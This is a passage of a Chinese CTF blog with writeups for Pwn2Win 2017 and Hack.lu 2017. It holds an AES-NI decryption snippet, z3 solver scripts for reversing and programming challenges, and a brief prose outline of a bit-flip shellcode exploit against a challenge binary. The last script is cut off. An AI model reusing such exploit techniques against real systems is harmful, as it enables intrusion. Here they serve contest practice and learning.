0x47cf6d49120447e7,0x2846fb67171be9b0 ; final</span><br><span class="line"></span><br><span class="line"> hex(0xe719e6285f-0x000000e719e62000)</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><tmmintrin.h></span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string"><wmmintrin.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span> <span class="params">()</span> {</span><br><span class="line"> <span class="type">__int64_t</span> a[<span class="number">2</span>] = {<span class="number">0</span>,<span class="number">0</span>};</span><br><span class="line"> <span class="type">__int64_t</span> round_key[] = {<span class="number">0xfffe07e803fdc148</span>,<span class="number">0xdb312074ed8548ff</span>,<span class="number">0x0000000000841f0f</span>,<span class="number">0x8944f6894cea894c</span>,<span class="number">0xc38348dc14ff41ff</span>,<span class="number">0x8348ea75dd394801</span>,<span class="number">0x5d415c415d5b08c4</span>,<span class="number">0x2e6690c35f415e41</span>,<span class="number">0x0000000000841f0f</span>,<span class="number">0x08ec83480000c3f3</span>,<span class="number">0x000000c308c48348</span>,<span class="number">0x6800732500020001</span>,<span class="number">0x73257b6e6f637469</span>,<span class="number">0x3b031b0100000a7d</span>,<span class="number">0x0000000700000040</span>,<span class="number">0x0000008cfffffdbc</span>,<span class="number">0x000000b4fffffdcc</span>,<span class="number">0x0000005cfffffdec</span>,<span class="number">0x000000ccffffff1c</span>,<span class="number">0x000000ecffffff57</span>};</span><br><span class="line"> <span class="type">__int64_t</span> final[] = {<span class="number">0x47cf6d49120447e7</span>^<span class="number">0x0000010cffffff6c</span>,<span class="number">0x2846fb67171be9b0</span>^<span class="number">0x00000154ffffffdc</span>};</span><br><span class="line"> __m128i mfinal = _mm_load_si128((__m128i *)final);</span><br><span class="line"> <span class="keyword">for</span> (<span class="type">int</span> i=<span class="number">0</span>;i<<span class="number">9</span>;i++)</span><br><span class="line"> {</span><br><span class="line"> <span class="type">__int64_t</span>* b = &round_key[(<span class="number">9</span>-i)*<span class="number">2</span>];</span><br><span class="line"> __m128i key = _mm_load_si128((__m128i *)b);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Round key %d: %016llx %016llx\n"</span>,<span class="number">9</span>-i,b[<span class="number">0</span>],b[<span class="number">1</span>]);</span><br><span class="line"> mfinal = _mm_aesdec_si128(mfinal,_mm_aesimc_si128(key));</span><br><span class="line"> }</span><br><span class="line"> __m128i key = _mm_load_si128((__m128i *)&round_key);</span><br><span class="line"> mfinal = _mm_aesdeclast_si128(mfinal,(key));</span><br><span class="line"> _mm_storeu_si128(a, mfinal);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%llx %llx"</span>,a[<span class="number">0</span>],a[<span class="number">1</span>]);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h2 id="天衣無縫Fantastic-Seamless-Textile"><a href="#天衣無縫Fantastic-Seamless-Textile" class="headerlink" title="天衣無縫Fantastic Seamless Textile"></a>天衣無縫<del>Fantastic Seamless Textile</del></h2><p><a href="https://gist.github.com/pzread/2ae0bb3aa5fe0dc69fcf3257c41db944">https://gist.github.com/pzread/2ae0bb3aa5fe0dc69fcf3257c41db944</a><br><a href="https://github.com/radare/radare2/pull/8796">https://github.com/radare/radare2/pull/8796</a></p>
2017-11-08T02:26:05.000Z
https://azure.kdays.cn/2017/10/23/Pwn2Win2017/
Pwn2Win2017 writeup
<p>周末做了两道题,想尝试下ppc结果因为电阻间不同阻值只存了后面那个被坑了一整天……Orz</p>
<span id="more"></span>
<h1 id="PPC-M"><a href="#PPC-M" class="headerlink" title="PPC-M"></a>PPC-M</h1><h2 id="Resistance"><a href="#Resistance" class="headerlink" title="Resistance"></a>Resistance</h2><p>列KVL,设起点电压10终点电压0,然后z3求解。主办方表示卧槽这题z3居然能做?比预期解慢,但是起码是对的_(:з)∠)_</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="keyword">import</span> ssl, socket</span><br><span class="line"><span class="keyword">import</span> z3</span><br><span class="line"></span><br><span class="line">y = [z3.Real(<span class="string">'a_%d'</span>%i) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">30</span>)]</span><br><span class="line">d = <span class="built_in">dict</span>()</span><br><span class="line">connection = <span class="built_in">dict</span>()</span><br><span class="line">nodes = <span class="built_in">set</span>()</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Connect</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, host, port</span>):</span><br><span class="line"> self.context = ssl.create_default_context()</span><br><span class="line"> self.conn = self.context.wrap_socket(</span><br><span class="line"> socket.socket(socket.AF_INET),</span><br><span class="line"> server_hostname=host)</span><br><span class="line"> self.conn.connect((host, port))</span><br><span class="line"> self.f = self.conn.makefile(<span class="string">'rwb'</span>, <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__enter__</span>(<span class="params">self</span>):</span><br><span class="line"> <span class="keyword">return</span> self.f</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__exit__</span>(<span class="params">self, <span class="built_in">type</span>, value, traceback</span>):</span><br><span class="line"> self.f.close()</span><br><span class="line"></span><br><span class="line">ncount = <span class="number">0</span></span><br><span class="line"><span class="keyword">with</span> Connect(<span class="string">'programming.pwn2win.party'</span>, <span class="number">9001</span>) <span class="keyword">as</span> f:</span><br><span class="line"><span class="comment">#b = open('d.txt','w')</span></span><br><span class="line"><span class="comment">#with open('test.txt','rb') as f:</span></span><br><span class="line"> <span class="keyword">for</span> line <span class="keyword">in</span> f:</span><br><span class="line"> line = line.strip()</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'received: %s'</span> % line)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> line.startswith(<span class="string">b'CTF-BR{'</span>) <span class="keyword">or</span> \</span><br><span class="line"> line == <span class="string">b'WRONG ANSWER'</span>: <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"> numbers = <span class="built_in">map</span>(<span class="built_in">int</span>, line.split())</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(numbers)==<span class="number">3</span>:</span><br><span class="line"> <span class="keyword">if</span> ncount==<span class="number">0</span>:</span><br><span class="line"> d = <span class="built_in">dict</span>()</span><br><span class="line"> connection = <span class="built_in">dict</span>()</span><br><span class="line"> nodes = <span class="built_in">set</span>()</span><br><span class="line"> </span><br><span class="line"> nodes.add(numbers[<span class="number">0</span>])</span><br><span class="line"> nodes.add(numbers[<span class="number">1</span>])</span><br><span class="line"> ar = <span class="built_in">min</span>(numbers[<span class="number">0</span>],numbers[<span class="number">1</span>]),<span class="built_in">max</span>(numbers[<span class="number">0</span>],numbers[<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">if</span> ar <span class="keyword">not</span> <span class="keyword">in</span> d.keys():</span><br><span class="line"> d[ar] = [numbers[<span class="number">2</span>]]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> d[ar].append(numbers[<span class="number">2</span>])</span><br><span class="line"> <span class="keyword">if</span> numbers[<span class="number">0</span>] <span class="keyword">in</span> connection.keys():</span><br><span class="line"> <span class="keyword">if</span> numbers[<span class="number">1</span>] <span class="keyword">not</span> <span class="keyword">in</span> connection[numbers[<span class="number">0</span>]]:</span><br><span class="line"> connection[numbers[<span class="number">0</span>]].append(numbers[<span class="number">1</span>])</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> connection[numbers[<span class="number">0</span>]] = [numbers[<span class="number">1</span>]]</span><br><span class="line"> <span class="keyword">if</span> numbers[<span class="number">1</span>] <span class="keyword">in</span> connection.keys():</span><br><span class="line"> <span class="keyword">if</span> numbers[<span class="number">0</span>] <span class="keyword">not</span> <span class="keyword">in</span> connection[numbers[<span class="number">1</span>]]:</span><br><span class="line"> connection[numbers[<span class="number">1</span>]].append(numbers[<span class="number">0</span>])</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> connection[numbers[<span class="number">1</span>]] = [numbers[<span class="number">0</span>]]</span><br><span class="line"></span><br><span class="line"> ncount+=<span class="number">1</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">elif</span> <span class="built_in">len</span>(numbers) == <span class="number">2</span>:</span><br><span class="line"> ncount = <span class="number">0</span></span><br><span class="line"> <span class="keyword">if</span> numbers[<span class="number">0</span>]==numbers[<span class="number">1</span>]:</span><br><span class="line"> f.write(<span class="string">'0.000\n'</span>)</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"0.000"</span></span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="comment">#solve all KVL</span></span><br><span class="line"> s = z3.Solver()</span><br><span class="line"> <span class="keyword">for</span> m <span class="keyword">in</span> nodes:</span><br><span class="line"> <span class="built_in">sum</span> = <span class="number">0</span></span><br><span class="line"> <span class="keyword">if</span> m!=numbers[<span class="number">0</span>] <span class="keyword">and</span> m!=numbers[<span class="number">1</span>]:</span><br><span class="line"> <span class="keyword">for</span> n <span class="keyword">in</span> connection[m]:</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> d[<span class="built_in">min</span>(n,m),<span class="built_in">max</span>(n,m)]:</span><br><span class="line"> <span class="built_in">sum</span> += ((y[m] - y[n]) / k)</span><br><span class="line"> s.add(<span class="built_in">sum</span> == <span class="number">0.0</span>)</span><br><span class="line"> s.add(y[numbers[<span class="number">0</span>]]==<span class="number">10.0</span>)</span><br><span class="line"> s.add(y[numbers[<span class="number">1</span>]]==<span class="number">0.0</span>)</span><br><span class="line"> s.check()</span><br><span class="line"> m = s.model()</span><br><span class="line"> <span class="comment">#print m</span></span><br><span class="line"> flag = <span class="built_in">map</span>(<span class="keyword">lambda</span> sym: m[sym], y)</span><br><span class="line"> start = <span class="built_in">float</span>(<span class="built_in">eval</span>(<span class="built_in">str</span>(flag[numbers[<span class="number">0</span>]])+<span class="string">'.'</span>))</span><br><span class="line"> <span class="built_in">sum</span>=<span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> n <span class="keyword">in</span> connection[numbers[<span class="number">0</span>]]:</span><br><span class="line"> <span class="keyword">for</span> k <span class="keyword">in</span> d[<span class="built_in">min</span>(numbers[<span class="number">0</span>],n),<span class="built_in">max</span>(n,numbers[<span class="number">0</span>])]:</span><br><span class="line"> <span class="built_in">sum</span>+=(m[y[numbers[<span class="number">0</span>]]]-m[y[n]])/k</span><br><span class="line"> <span class="built_in">sum</span> = <span class="built_in">eval</span>(<span class="built_in">str</span>(z3.simplify(<span class="built_in">sum</span>))+<span class="string">'.'</span>)</span><br><span class="line"> f.write((<span class="string">"%.3f\n"</span>%(<span class="number">10.0</span>/<span class="built_in">sum</span>)).encode(<span class="string">'utf-8'</span>))</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"%.3f"</span>%(<span class="number">10.0</span>/<span class="built_in">sum</span>)</span><br></pre></td></tr></table></figure>
<h1 id="Reversing"><a href="#Reversing" class="headerlink" title="Reversing"></a>Reversing</h1><h2 id="Achievement-Unlocked"><a href="#Achievement-Unlocked" class="headerlink" title="Achievement Unlocked"></a>Achievement Unlocked</h2><p>golang 写的,没啥好说的,z3解</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> z3</span><br><span class="line">ans_len = <span class="number">30</span></span><br><span class="line">y = z3.BitVecs(<span class="string">' '</span>.join(<span class="string">"a_%d"</span>%i <span class="keyword">for</span> i <span class="keyword">in</span> xrange(ans_len)), <span class="number">8</span>)</span><br><span class="line">x = [<span class="number">0</span>]*ans_len</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(ans_len):</span><br><span class="line"> x[i] = z3.ZeroExt(<span class="number">8</span>,y[i])</span><br><span class="line"></span><br><span class="line">s = z3.Solver()</span><br><span class="line"></span><br><span class="line">a = [<span class="number">217</span>, <span class="number">6</span>, <span class="number">224</span>, <span class="number">68</span>, <span class="number">21</span>, <span class="number">153</span>, <span class="number">30</span>, <span class="number">144</span>, <span class="number">249</span>, <span class="number">89</span>, <span class="number">109</span>, <span class="number">245</span>, <span class="number">111</span>, <span class="number">55</span>, <span class="number">163</span>, <span class="number">40</span>, <span class="number">174</span>, <span class="number">21</span>, <span class="number">115</span>, <span class="number">99</span>, <span class="number">173</span>, <span class="number">42</span>, <span class="number">12</span>, <span class="number">209</span>, <span class="number">143</span>, <span class="number">226</span>, <span class="number">47</span>, <span class="number">136</span>, <span class="number">158</span>, <span class="number">158</span>, <span class="number">58</span>, <span class="number">77</span>, <span class="number">67</span>, <span class="number">84</span>, <span class="number">70</span>, <span class="number">45</span>, <span class="number">66</span>, <span class="number">82</span>, <span class="number">123</span>, <span class="number">84</span>, <span class="number">104</span>, <span class="number">105</span>, <span class="number">115</span>, <span class="number">95</span>, <span class="number">67</span>, <span class="number">48</span>, <span class="number">85</span>, <span class="number">108</span>, <span class="number">100</span>, <span class="number">95</span>, <span class="number">66</span>, <span class="number">51</span>, <span class="number">95</span>, <span class="number">52</span>, <span class="number">83</span>, <span class="number">95</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">83</span>, <span class="number">121</span>, <span class="number">95</span>, <span class="number">52</span>, <span class="number">115</span>, <span class="number">95</span>, <span class="number">116</span>, <span class="number">104</span>, <span class="number">49</span>, <span class="number">83</span>, <span class="number">125</span>, <span class="number">10</span>, <span class="number">19</span>, <span class="number">152</span>, <span class="number">116</span>, <span class="number">104</span>, <span class="number">49</span>, <span class="number">83</span>, <span class="number">125</span>, <span class="number">10</span>, <span class="number">19</span>, <span class="number">152</span>, <span class="number">81</span>, <span class="number">237</span>, <span class="number">69</span>, <span class="number">212</span>, <span class="number">147</span>, <span class="number">42</span>, <span class="number">94</span>, <span class="number">184</span>, <span class="number">20</span>, <span class="number">227</span>, <span class="number">251</span>, <span class="number">168</span>, <span class="number">210</span>, <span class="number">97</span>, <span class="number">183</span>, <span class="number">36</span>, <span class="number">147</span>, <span class="number">236</span>, <span class="number">35</span>, <span class="number">65</span>, <span class="number">192</span>, <span class="number">16</span>, <span class="number">128</span>, <span class="number">188</span>, <span class="number">52</span>, <span class="number">149</span>, <span class="number">46</span>, <span class="number">138</span>, <span class="number">17</span>, <span class="number">251</span>, <span class="number">86</span>, <span class="number">163</span>, <span class="number">62</span>, <span class="number">195</span>, <span class="number">119</span>, <span class="number">228</span>, <span class="number">54</span>, <span class="number">102</span>, <span class="number">57</span>, <span class="number">36</span>, <span class="number">145</span>, <span class="number">140</span>, <span class="number">174</span>, <span class="number">140</span>, <span class="number">172</span>, <span class="number">177</span>, <span class="number">154</span>, <span class="number">104</span>, <span class="number">150</span>, <span class="number">90</span>, <span class="number">39</span>, <span class="number">38</span>, <span class="number">237</span>, <span class="number">31</span>, <span class="number">142</span>, <span class="number">48</span>, <span class="number">59</span>, <span class="number">159</span>, <span class="number">63</span>, <span class="number">113</span>, <span class="number">82</span>, <span class="number">37</span>, <span class="number">81</span>, <span class="number">227</span>, <span class="number">122</span>, <span class="number">33</span>, <span class="number">149</span>, <span class="number">58</span>, <span class="number">87</span>, <span class="number">62</span>, <span class="number">78</span>, <span class="number">112</span>, <span class="number">54</span>, <span class="number">230</span>, <span class="number">37</span>, <span class="number">243</span>, <span class="number">4</span>, <span class="number">116</span>, <span class="number">210</span>, <span class="number">236</span>, <span class="number">47</span>, <span class="number">178</span>, <span class="number">81</span>, <span class="number">162</span>, <span class="number">38</span>, <span class="number">87</span>, <span class="number">131</span>, <span class="number">170</span>, <span class="number">100</span>, <span class="number">119</span>, <span class="number">36</span>, <span class="number">176</span>, <span class="number">131</span>, <span class="number">91</span>, <span class="number">119</span>, <span class="number">31</span>, <span class="number">57</span>, <span class="number">195</span>, <span class="number">53</span>, <span class="number">107</span>, <span class="number">14</span>, <span class="number">58</span>, <span class="number">20</span>, <span class="number">68</span>, <span class="number">20</span>, <span class="number">246</span>, <span class="number">207</span>, <span class="number">24</span>, <span class="number">82</span>, <span class="number">216</span>, <span class="number">21</span>, <span class="number">189</span>, <span class="number">18</span>, <span class="number">121</span>, <span class="number">155</span>, <span class="number">211</span>, <span class="number">192</span>, <span class="number">5</span>, <span class="number">248</span>, <span class="number">127</span>, <span class="number">229</span>, <span class="number">253</span>, <span class="number">124</span>, <span class="number">116</span>, <span class="number">67</span>, <span class="number">78</span>, <span class="number">43</span>, <span class="number">111</span>, <span class="number">75</span>, <span class="number">168</span>, <span class="number">11</span>, <span class="number">144</span>, <span class="number">29</span>, <span class="number">36</span>, <span class="number">28</span>, <span class="number">203</span>, <span class="number">224</span>, <span class="number">184</span>, <span class="number">10</span>, <span class="number">84</span>, <span class="number">30</span>, <span class="number">100</span>, <span class="number">168</span>, <span class="number">142</span>, <span class="number">164</span>, <span class="number">142</span>, <span class="number">34</span>, <span class="number">220</span>, <span class="number">96</span>, <span class="number">173</span>, <span class="number">118</span>, <span class="number">173</span>, <span class="number">157</span>, <span class="number">49</span>, <span class="number">231</span>, <span class="number">219</span>, <span class="number">13</span>, <span class="number">49</span>, <span class="number">35</span>, <span class="number">13</span>]</span><br><span class="line">final = [<span class="number">208</span>, <span class="number">113</span>, <span class="number">230</span>, <span class="number">50</span>, <span class="number">15</span>, <span class="number">58</span>, <span class="number">9</span>, <span class="number">46</span>, <span class="number">248</span>, <span class="number">161</span>, <span class="number">182</span>, <span class="number">82</span>, <span class="number">222</span>, <span class="number">205</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">82</span>, <span class="number">159</span>, <span class="number">79</span>, <span class="number">185</span>, <span class="number">244</span>, <span class="number">114</span>, <span class="number">118</span>, <span class="number">193</span>, <span class="number">52</span>, <span class="number">53</span>, <span class="number">238</span>, <span class="number">247</span>, <span class="number">218</span>, <span class="number">80</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(a)/<span class="number">8</span>):</span><br><span class="line"> m = a[i*<span class="number">8</span>:(i+<span class="number">1</span>)*<span class="number">8</span>]</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line"> x[i] = (<span class="number">1</span><<j)&m[j]^x[i]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(ans_len):</span><br><span class="line"> s.add(x[i]==final[i])</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> s.check() == z3.sat:</span><br><span class="line"> m = s.model()</span><br><span class="line"> <span class="built_in">print</span> m</span><br><span class="line"> flag = <span class="built_in">map</span>(<span class="keyword">lambda</span> sym: m[sym], y)</span><br><span class="line"> flag = <span class="built_in">map</span>(<span class="keyword">lambda</span> val: <span class="built_in">chr</span>(<span class="built_in">int</span>(<span class="built_in">str</span>(val))), flag) <span class="comment"># wtf</span></span><br><span class="line"> <span class="built_in">print</span> <span class="built_in">len</span>(flag)</span><br><span class="line"> <span class="built_in">print</span> <span class="string">''</span>.join(flag)</span><br></pre></td></tr></table></figure>
2017-10-23T06:56:00.000Z
https://azure.kdays.cn/2017/10/19/Hack-lu-2017-writeup/
Hack.lu 2017 writeup
<p>TO BE CONTINUE<br>这两天做了hacklu2017,随便写写,有空再补了。其实比较倒霉,6点比赛结束,6点02算出了LostKey的flag……手速还是不行啊,得多练……</p>
<span id="more"></span>
<h1 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h1><h2 id="bit"><a href="#bit" class="headerlink" title="bit"></a>bit</h2><p>40072b:4 - > loop<br>overwrite main ret instruction to long jump to start of main function input logic and reflip 40072b:4. Then write the shellcode to 0400741, and finally reflip 40072b:4 to get shellcode execute.</p>
<h1 id="Rev"><a href="#Rev" class="headerlink" title="Rev"></a>Rev</h1><h2 id="The-Maya-Society"><a href="#The-Maya-Society" class="headerlink" title="The Maya Society"></a>The Maya Society</h2><p>13.0.0.0 on the home page is not a ip address, it’s 2012.12.21 in Maya calendar, just set the time to 2012.12.11 and run the program to get the flag.</p>
<h2 id="Rusted-from-the-Rain"><a href="#Rusted-from-the-Rain" class="headerlink" title="Rusted from the Rain"></a>Rusted from the Rain</h2><p>Reverse and write script to solve.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> z3</span><br><span class="line"></span><br><span class="line">ans_len = <span class="number">28</span></span><br><span class="line">y = z3.BitVecs(<span class="string">' '</span>.join(<span class="string">"a_%d"</span>%i <span class="keyword">for</span> i <span class="keyword">in</span> xrange(ans_len)), <span class="number">8</span>)</span><br><span class="line">x = [<span class="number">0</span>]*ans_len</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(ans_len):</span><br><span class="line"> x[i] = z3.ZeroExt(<span class="number">8</span>,y[i])</span><br><span class="line"></span><br><span class="line">s = z3.Solver()</span><br><span class="line">s.add(x[<span class="number">13</span>]==x[<span class="number">14</span>])</span><br><span class="line">s.add(x[<span class="number">18</span>]==x[<span class="number">19</span>])</span><br><span class="line">s.add(x[<span class="number">5</span>]==x[<span class="number">26</span>])</span><br><span class="line">s.add(x[<span class="number">23</span>]==x[<span class="number">7</span>])</span><br><span class="line">s.add(x[<span class="number">9</span>]==x[<span class="number">16</span>])</span><br><span class="line">s.add(x[<span class="number">9</span>]==x[<span class="number">21</span>])</span><br><span class="line">s.add(x[<span class="number">8</span>]==x[<span class="number">22</span>])</span><br><span class="line"></span><br><span class="line">s.add(x[<span class="number">27</span>]-x[<span class="number">4</span>]==<span class="number">2</span>)</span><br><span class="line">s.add(x[<span class="number">0</span>] ==<span class="number">63</span>+<span class="number">7</span>)</span><br><span class="line">s.add(x[<span class="number">1</span>] ==<span class="number">63</span>+<span class="number">0xd</span>)</span><br><span class="line">s.add(x[<span class="number">2</span>] ==<span class="number">63</span>+<span class="number">2</span>)</span><br><span class="line">s.add(x[<span class="number">3</span>] ==<span class="number">63</span>+<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">s.add(x[<span class="number">21</span>] <= <span class="number">0x60</span>)</span><br><span class="line">s.add(x[<span class="number">14</span>] + x[<span class="number">18</span>] == <span class="number">0xD1</span>)</span><br><span class="line">s.add(x[<span class="number">14</span>] - x[<span class="number">18</span>] == <span class="number">7</span>)</span><br><span class="line">s.add(x[<span class="number">10</span>] == x[<span class="number">15</span>])</span><br><span class="line">s.add((~x[<span class="number">24</span>])&<span class="number">0xff</span> & x[<span class="number">17</span>]== <span class="number">0</span>)</span><br><span class="line">s.add(x[<span class="number">17</span>] == <span class="number">115</span>)</span><br><span class="line">s.add((~(x[<span class="number">10</span>] ^ <span class="number">0x73</span>)) & <span class="number">0xFF</span> == <span class="number">0xFF</span>)</span><br><span class="line">s.add(((<span class="number">2</span> * x[<span class="number">25</span>])&<span class="number">0xff</span>) % x[<span class="number">24</span>] == <span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">v12 = (x[<span class="number">23</span>] + x[<span class="number">25</span>])&<span class="number">0xff</span></span><br><span class="line">s.add((v12 - <span class="number">99</span> * ((<span class="number">83</span> * v12 & <span class="number">0x6000</span>) >> <span class="number">13</span>))== <span class="number">35</span>)</span><br><span class="line">s.add(<span class="number">3</span> * x[<span class="number">11</span>] + <span class="number">2</span> * x[<span class="number">12</span>] + x[<span class="number">20</span>] == <span class="number">640</span>)</span><br><span class="line">s.add( x[<span class="number">6</span>] - <span class="number">35</span> * ((<span class="number">235</span> * x[<span class="number">6</span>] & <span class="number">0xE000</span>) >> <span class="number">13</span>) == <span class="number">6</span>)</span><br><span class="line">s.add(x[<span class="number">8</span>] != <span class="number">0</span>)</span><br><span class="line">s.add((((<span class="number">2</span> * x[<span class="number">6</span>])&<span class="number">0xff</span>) % x[<span class="number">8</span>]) & <span class="number">0xFF</span> == x[<span class="number">14</span>] )</span><br><span class="line">res = [<span class="number">0x7fed</span>,<span class="number">0xfb11</span>,<span class="number">0xeabe</span>,<span class="number">0x2631</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line"> v17 = <span class="number">0</span></span><br><span class="line"> v20 = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line"> v20 = (v20 + x[i*<span class="number">7</span>+j]) % <span class="number">0xFF</span></span><br><span class="line"> v17 = (v20 + v17) % <span class="number">0xFF</span></span><br><span class="line"> s.add(res[i] == (v17 | (v20 << <span class="number">8</span>)))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> s.check() == z3.sat:</span><br><span class="line"> m = s.model()</span><br><span class="line"> <span class="built_in">print</span> m</span><br><span class="line"> flag = <span class="built_in">map</span>(<span class="keyword">lambda</span> sym: 